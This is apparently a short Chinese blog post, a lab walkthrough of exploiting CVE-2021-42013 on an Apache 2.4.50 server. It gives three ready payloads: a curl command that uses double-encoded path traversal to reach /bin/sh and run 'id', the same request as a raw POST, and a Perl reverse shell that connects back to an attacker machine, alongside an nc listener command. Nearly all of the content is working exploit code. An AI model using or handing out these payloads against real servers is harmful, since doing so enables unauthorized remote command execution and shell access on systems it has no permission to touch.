CVE_2021_42013

1、查看中间件信息

有些时候直接从浏览器的检查就可以看到中间件信息:

image-20241212191515441

可以看到,是Apache 2.4.50满足cve_2021_42013

2、测试

法一:shell测试

payload:

curl --data "echo;id" 'http://192.168.120.133:35846/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

image-20241212201041349

法二:发包法

payload:

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

image-20241212201915299

法三:反弹shell

payload:

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

echo;perl -e 'use Socket;$ip="192.168.120.144";$port=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}'

kali监听:

nc -lvvp 5566

image-20241213093231788

成功反弹!

posted @ 2025-12-02 09:23  shinianyunyan  阅读(10)  评论(0)    收藏  举报